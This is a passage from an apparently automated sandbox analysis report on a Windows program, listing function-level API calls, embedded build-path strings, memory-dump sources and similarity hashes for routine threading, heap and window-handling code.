                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp, xrefs: 0048612C
                                                                                                • (US, xrefs: 004860FD
                                                                                                • @fO, xrefs: 00486136
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: (US$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp
                                                                                                • API String ID: 944179621-3622890359
                                                                                                • Opcode ID: e769a333a22375313f92310df42c91140459fc829b438edea8960fb9d6bb9127
                                                                                                • Instruction ID: a86bfc1d586ceb82d4f7e6513c76f150f51d6522f743f223589e2486b5fda4c2
                                                                                                • Opcode Fuzzy Hash: e769a333a22375313f92310df42c91140459fc829b438edea8960fb9d6bb9127
                                                                                                • Instruction Fuzzy Hash: D1115C71944754AFD711EB688C05BAF7F64AB02714F24074BF824B73C2E3B81904C3A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004A3820: EnterCriticalSection.KERNEL32(00000070), ref: 004A384B
                                                                                                  • Part of subcall function 004A3820: InterlockedDecrement.KERNEL32(00000004), ref: 004A3879
                                                                                                  • Part of subcall function 004A3820: LeaveCriticalSection.KERNEL32(00000070), ref: 004A3891
                                                                                                • EnterCriticalSection.KERNEL32(0000002C), ref: 0049F1A8
                                                                                                • LeaveCriticalSection.KERNEL32(0000002C), ref: 0049F1CB
                                                                                                • Sleep.KERNEL32(00000064), ref: 0049F1DB
                                                                                                Strings
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\serverjobmanager.cpp, xrefs: 0049F1EC
                                                                                                • @fO, xrefs: 0049F1F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$DecrementInterlockedSleep
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\serverjobmanager.cpp
                                                                                                • API String ID: 1954866676-1838520060
                                                                                                • Opcode ID: ac66fe00ba20f05c7743c0f83ecc7e471eeed5493abad4230c0e2e8e712d1c82
                                                                                                • Instruction ID: 54545971cabe5edd409ab939f6595ac802111697ad15f85efe95147cc906936c
                                                                                                • Opcode Fuzzy Hash: ac66fe00ba20f05c7743c0f83ecc7e471eeed5493abad4230c0e2e8e712d1c82
                                                                                                • Instruction Fuzzy Hash: 39110431944354EBE7209B68DC06BAABBF4EB05715F10022FE865A33C1E3F92904C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004931C6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\basefile.h$gfff
                                                                                                • API String ID: 3508698243-2990745513
                                                                                                • Opcode ID: 7703cc3b593479a4ffb42873afac39631fba46b042594dd149974d92d22ee688
                                                                                                • Instruction ID: 86ac5411e4d3a0b934cb5016326e6ec01756f87de3cb267c671d2c03a3e9c481
                                                                                                • Opcode Fuzzy Hash: 7703cc3b593479a4ffb42873afac39631fba46b042594dd149974d92d22ee688
                                                                                                • Instruction Fuzzy Hash: 6F51BD70A006169FCB14CF29C895B6ABBB4FF49314F1485AEE815DB391DB78E901CBC9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004CB3C0: HeapAlloc.KERNEL32(00000008,?,00000000,?,004CB8DA,00000001,00000364,?,004BE1F9,004844FC,?,00000000,?,004844FC,00000000), ref: 004CB401
                                                                                                • _free.LIBCMT ref: 004C5359
                                                                                                • _free.LIBCMT ref: 004C5361
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$AllocHeap
                                                                                                • String ID: x0O
                                                                                                • API String ID: 1835388192-2626062856
                                                                                                • Opcode ID: 4da8b7cfc867544565d1dc89b078f3b4f1c567bd1b501c89f209473c15c54c9e
                                                                                                • Instruction ID: 320795324c2b7b070c3f1edc980e42dadec17c7a87b81281b243328541da1d3a
                                                                                                • Opcode Fuzzy Hash: 4da8b7cfc867544565d1dc89b078f3b4f1c567bd1b501c89f209473c15c54c9e
                                                                                                • Instruction Fuzzy Hash: E521053A104614AED7956AA69C42F5F27E8EF81364F20406FFC0487291EEBCA94186AD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0048D550: InterlockedDecrement.KERNEL32(00000000), ref: 0048D596
                                                                                                  • Part of subcall function 0048D550: InterlockedDecrement.KERNEL32(?), ref: 0048D621
                                                                                                  • Part of subcall function 00478640: InterlockedIncrement.KERNEL32(00530380), ref: 00478677
                                                                                                  • Part of subcall function 0048DAD0: InterlockedDecrement.KERNEL32(?), ref: 0048DB55
                                                                                                  • Part of subcall function 0048DAD0: InterlockedIncrement.KERNEL32(00000000), ref: 0048DBD8
                                                                                                  • Part of subcall function 0048DAD0: InterlockedDecrement.KERNEL32(00000000), ref: 0048DBE2
                                                                                                  • Part of subcall function 0048DAD0: InterlockedDecrement.KERNEL32(000000FF), ref: 0048DC0A
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048D337
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048D3E8
                                                                                                  • Part of subcall function 00495910: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,004E6120,000000FF,?,0048D3BD,?,?,?,?), ref: 00495960
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$InfoSystem
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 661114864-1285152028
                                                                                                • Opcode ID: 50a833d292673ffe06bef5d3e2f7e66c0afb460659410f078f204a40748e69de
                                                                                                • Instruction ID: 89ef69926274122948c90593b131f03e8d99f04528372a7968ed8ddfcbec5fa1
                                                                                                • Opcode Fuzzy Hash: 50a833d292673ffe06bef5d3e2f7e66c0afb460659410f078f204a40748e69de
                                                                                                • Instruction Fuzzy Hash: 7131B371901649ABCB01EF55CC01BAF7BA9EF84710F10891EFC15A7381DB789E119BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 004CF457
                                                                                                • _free.LIBCMT ref: 004CF4AD
                                                                                                  • Part of subcall function 004CF289: _free.LIBCMT ref: 004CF2E1
                                                                                                  • Part of subcall function 004CF289: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004F35E0), ref: 004CF2F3
                                                                                                  • Part of subcall function 004CF289: WideCharToMultiByte.KERNEL32(00000000,00000000,00533D8C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CF36B
                                                                                                  • Part of subcall function 004CF289: WideCharToMultiByte.KERNEL32(00000000,00000000,00533DE0,000000FF,?,0000003F,00000000,?), ref: 004CF398
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                • String ID: 5O
                                                                                                • API String ID: 314583886-2690845227
                                                                                                • Opcode ID: 0da48cf3fbe9c6bdb8bb16322803bc1cbc4b296d213cbe688610bdbfb51d44da
                                                                                                • Instruction ID: e0411cb070e3676ca4b9fc63bd060dc27042e164a323c65c8b9d71b87b2e1a95
                                                                                                • Opcode Fuzzy Hash: 0da48cf3fbe9c6bdb8bb16322803bc1cbc4b296d213cbe688610bdbfb51d44da
                                                                                                • Instruction Fuzzy Hash: 7F213D3A80011857CB74A6319C45FEB7369CB61334F1002BFE99492281EB3C4D8A869D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 004541D5
                                                                                                • @fO, xrefs: 004541DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ItemWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 1669990519-3471680474
                                                                                                • Opcode ID: ea807d17bf5e46f257bec64b12ac5cd683b8259cc9705a809eb1ac33fe16c4d4
                                                                                                • Instruction ID: ca51bc60a9894c549c33a1ce05376f82d4b60d3e72a1243d135b2f8aefdc83a6
                                                                                                • Opcode Fuzzy Hash: ea807d17bf5e46f257bec64b12ac5cd683b8259cc9705a809eb1ac33fe16c4d4
                                                                                                • Instruction Fuzzy Hash: FE219E716003008FD700EF28C989B5ABBE4BB94318F04856EE9449F293E775E948CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00481384
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00478640: InterlockedIncrement.KERNEL32(00530380), ref: 00478677
                                                                                                  • Part of subcall function 0046D6D0: TlsGetValue.KERNEL32(00000000,00000000,00530380,?,?,00000000,00000104,00530380,00000000), ref: 0046D6F9
                                                                                                  • Part of subcall function 0046D6D0: TlsSetValue.KERNEL32(0053011C,?,?,00000000,00000104,00530380,00000000), ref: 0046D717
                                                                                                  • Part of subcall function 0046D6D0: InterlockedIncrement.KERNEL32(00000000), ref: 0046D7A2
                                                                                                  • Part of subcall function 0046D6D0: __CxxThrowException@8.LIBVCRUNTIME ref: 0046D7C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$Interlocked$CriticalException@8IncrementSectionThrow$DecrementEnterLeave
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\tempfile.cpp$xMS
                                                                                                • API String ID: 22870917-3863375822
                                                                                                • Opcode ID: 6b06b5f024c6bd030ef295bcf8bda22e050a85d431e889980edb4fda628f4fa4
                                                                                                • Instruction ID: b6ceaf3d10dc146ce583f9eb673bb76a3aa9ad3627408078dad17eec1e760c49
                                                                                                • Opcode Fuzzy Hash: 6b06b5f024c6bd030ef295bcf8bda22e050a85d431e889980edb4fda628f4fa4
                                                                                                • Instruction Fuzzy Hash: 2211C432E406199BDB10AB58CC02BBF77A9EB45B14F100A1FF815A76D1D7786D018799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004183FF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00418463
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00418483
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$DecrementEnterInterlockedLeave
                                                                                                • String ID: xMS
                                                                                                • API String ID: 1807080765-303485436
                                                                                                • Opcode ID: 782e638a4ee9d37a16fd0fbb5c2591497a976fde71fd89b15f9357898453c6b7
                                                                                                • Instruction ID: ef0b09857c2441d5168829c6a612b1e8ac455650fc376ef0a6336067b7c9f52e
                                                                                                • Opcode Fuzzy Hash: 782e638a4ee9d37a16fd0fbb5c2591497a976fde71fd89b15f9357898453c6b7
                                                                                                • Instruction Fuzzy Hash: 1421FE3590064AEFCB10CF68C8447EEBBB4EF45714F10866EE96167391CB785A40CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00435CD0: IsWindow.USER32(?), ref: 00435CF8
                                                                                                  • Part of subcall function 00435CD0: GetWindow.USER32(?,?), ref: 00435D28
                                                                                                • IsWindow.USER32(?), ref: 00460461
                                                                                                • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 00460499
                                                                                                Strings
                                                                                                • @fO, xrefs: 0046047C
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h, xrefs: 00460472
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 1496643700-447005085
                                                                                                • Opcode ID: a91a17fd94e0334718e36087a007d036e06a9c2a6e16fd0bd7a22df176e91d66
                                                                                                • Instruction ID: eeff7a0997195e2bdcd1d46782eb20f854e5196608e8622f9b177eb3b1e07227
                                                                                                • Opcode Fuzzy Hash: a91a17fd94e0334718e36087a007d036e06a9c2a6e16fd0bd7a22df176e91d66
                                                                                                • Instruction Fuzzy Hash: 331129703407056BE230AE258D46F2BB659EFC4709F15462EBA01E7282FF79D81086EA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 0048003F
                                                                                                • LeaveCriticalSection.KERNEL32(00534C18), ref: 004800C2
                                                                                                  • Part of subcall function 00473780: InterlockedDecrement.KERNEL32(?), ref: 004737FA
                                                                                                  • Part of subcall function 00473780: InterlockedDecrement.KERNEL32(?), ref: 00473855
                                                                                                  • Part of subcall function 00473780: InterlockedDecrement.KERNEL32(?), ref: 00473871
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048008C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked$CriticalSection$EnterLeave
                                                                                                • String ID: xMS
                                                                                                • API String ID: 4039988469-303485436
                                                                                                • Opcode ID: e744bdcc2240a4a6557894c4c38e32db5cd9edad2a5948c10683aa6659425fac
                                                                                                • Instruction ID: e491e6709651a0e2cf834d36609fe1c37fdfc496c392df5f42becc5f00d387fe
                                                                                                • Opcode Fuzzy Hash: e744bdcc2240a4a6557894c4c38e32db5cd9edad2a5948c10683aa6659425fac
                                                                                                • Instruction Fuzzy Hash: 24215430504645AFC710EBA8CC09BAEBFB4BF46714F10024DF415A73C1C7B85A00CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 00465054
                                                                                                • MonitorFromRect.USER32(?,00000002), ref: 00465098
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 00465065
                                                                                                • @fO, xrefs: 0046506F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FromMonitorRectWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 1496004618-3471680474
                                                                                                • Opcode ID: c12cc0b06a70cc89678b938bd016f823859dc1259bb01f8e8d7e050a3ccb6de6
                                                                                                • Instruction ID: 2ffdab3c2beb7cf57e6564c77d1d86632c6d51589163eebb158138bfe07588fc
                                                                                                • Opcode Fuzzy Hash: c12cc0b06a70cc89678b938bd016f823859dc1259bb01f8e8d7e050a3ccb6de6
                                                                                                • Instruction Fuzzy Hash: FD11D331B007055BE3109F24CD06B6BB3A8AF98704F40C51EF998DB292FBB4E94487D5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004170B3
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004170D2
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004170E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: HfO
                                                                                                • API String ID: 3508698243-1410110794
                                                                                                • Opcode ID: 8ffca0146773695627c707b192f17da86e4728d16b602a4e8a68ac8c550e5d00
                                                                                                • Instruction ID: e550c27bd4817f48f56bbac7fdb950de4b3eaaccedf70143d97396bf94b76ba3
                                                                                                • Opcode Fuzzy Hash: 8ffca0146773695627c707b192f17da86e4728d16b602a4e8a68ac8c550e5d00
                                                                                                • Instruction Fuzzy Hash: 952134B0901708DFC720CF98CA44B5ABBF8EF49714F10865EE8559B791C7B9EA048B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004701FF
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DecrementEnterException@8InterlockedLeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\archive.cpp$xMS
                                                                                                • API String ID: 132347594-3931180507
                                                                                                • Opcode ID: 1733cd23dcb908657b7249a79023f07ba398698d056a61ceabfcdaeaa5887399
                                                                                                • Instruction ID: 111228fa91e3eee2fa44a218f3bc4111b7da7b61b5381a8ceb81027c292637c4
                                                                                                • Opcode Fuzzy Hash: 1733cd23dcb908657b7249a79023f07ba398698d056a61ceabfcdaeaa5887399
                                                                                                • Instruction Fuzzy Hash: DB11E371A002049BD700EF59D841BBFBBB5EB84715F10812EF908A7381DBB94D0087D5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004392D0
                                                                                                  • Part of subcall function 004391E0: InterlockedIncrement.KERNEL32(00530380), ref: 00439205
                                                                                                  • Part of subcall function 004391E0: InterlockedDecrement.KERNEL32(?), ref: 0043923D
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004392FE
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00439327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: xMS
                                                                                                • API String ID: 4289621856-303485436
                                                                                                • Opcode ID: 6dc472b19d4fda7be6b78bb1b688493bd41c35f60654adc758e2e15f55c906de
                                                                                                • Instruction ID: ab2193ddf631fb4f7c7779d880a8212ee90f97eb20e1145df32cda1784a89eb3
                                                                                                • Opcode Fuzzy Hash: 6dc472b19d4fda7be6b78bb1b688493bd41c35f60654adc758e2e15f55c906de
                                                                                                • Instruction Fuzzy Hash: C611CE71A00615ABCB119F44C805BAFBFB4FF88714F14056AE805A3391C7B81A05CBDA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045B443
                                                                                                • IsWindowVisible.USER32 ref: 0045B470
                                                                                                  • Part of subcall function 0042C010: IsWindow.USER32(?), ref: 0042C03A
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0045B454
                                                                                                • @fO, xrefs: 0045B45E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Visible
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 3657826678-3471680474
                                                                                                • Opcode ID: b5257557d9fd11ebdd9a8af3d075f622ff86efe9b438fb4be2420d139b92a60c
